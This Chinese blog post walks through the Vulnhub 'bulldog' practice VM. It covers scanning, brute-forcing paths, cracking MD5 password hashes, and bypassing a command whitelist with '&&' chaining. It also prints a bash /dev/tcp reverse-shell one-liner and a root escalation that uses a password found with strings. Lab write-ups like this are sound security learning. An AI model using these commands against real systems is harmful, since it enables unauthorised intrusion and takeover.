博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
Vulnhub靶场渗透练习(三) bulldog
阅读量:4313 次
发布时间:2019-06-06

本文共 1264 字,大约阅读时间需要 4 分钟。

拿到靶场后先对ip进行扫描

获取ip  和端口

针对项目路径爆破

获取两个有用文件 

dev,admin  

更具dev 发现他们用到框架和语言 找到一个 shell 连接

    

反健源码 查看可以看到

丢入md5 网站解密 成功的解密2个用户

Back End: nick@bulldogindustries.com
用户名:nick,密码:bulldog (CMD5可免费解密出来)
Database: sarah@bulldogindustries.com
用户名:sarah,密码:bulldoglover (SOMD5可免费解密出来)
后台登录在访问 shell 操作地址 发现可以访问 得到一个命令控制台
有白名单限制

 

 这里想到是 && 和 ||

尝试执行

发现可以   这时候直接反弹shell

ls &&echo "bash -i >& /dev/tcp/192.168.18.1/4444 0>&1" | bash

反弹成功 输入python -c 'import pty;pty.spawn("/bin/bash")'  

在对历史操作记录查看和文件配置后并未发现有用信息  卡了很久 去看了 wp 才发现 root 密码要拆解

对 passwd 查出的用户进行 home 文件寻找信息

find / -user bulldogadmin    find / -user bulldogadmin django
(1) 发现值得关注的文件有:一个是note,一个是customPermissionApp。
/home/bulldogadmin/.hiddenadmindirectory/note
/home/bulldogadmin/.hiddenadmindirectory/customPermissionApp
(2) 打开note文本文件:发现提示webserver有时需要root权限访问。
(3) 打开customPermissionApp,看上去是可执行文件,使用strings打印其中的可打印字符:
这里得到的字符太多了  又卡住了  查看其他人写的wp 发现
,英文单词包括:SUPER、 ulitimate、PASSWORD、
youCANTget,这些都与最高权限账号相关  去掉h
变成一句通顺的英文句子:SUPERultimatePASSWORDyouCANTget
直接执行 su  切换root 用户

django@bulldog:/home/django/bulldog$ sudo su -

sudo su -
[sudo] password for django: bulldog

Sorry, try again.

[sudo] password for django: SUPERultimatePASSWORDyouCANTget

尬尴 虽然进去了 但是那个root 密码拼接的是真想不出来

 

转载于:https://www.cnblogs.com/feizianquan/p/11150388.html

你可能感兴趣的文章
解密zend-PHP凤凰源码程序
查看>>
python3 序列分片记录
查看>>
Atitit.git的存储结构and 追踪
查看>>
atitit 读书与获取知识资料的attilax的总结.docx
查看>>
B站 React教程笔记day2(3)React-Redux
查看>>
找了一个api管理工具
查看>>
C++——string类和标准模板库
查看>>
zt C++ list 类学习笔记
查看>>
git常用命令
查看>>
探讨和比较Java和_NET的序列化_Serialization_框架
查看>>
1、jQuery概述
查看>>
数组比较大小的几种方法及math是方法
查看>>
FTP站点建立 普通电脑版&&服务器版
查看>>
js 给一段代码,给出运行后的最终结果的一些综合情况、
查看>>
webservice 详解
查看>>
js自动补全实例
查看>>
VS无法启动调试:“生成下面的模块时,启用了优化或没有调试信息“
查看>>
npm 安装 sass=-=-=
查看>>
WINFORM中加入WPF控件并绑定数据源实现跨线程自动更新
查看>>
C#类对象的事件定义
查看>>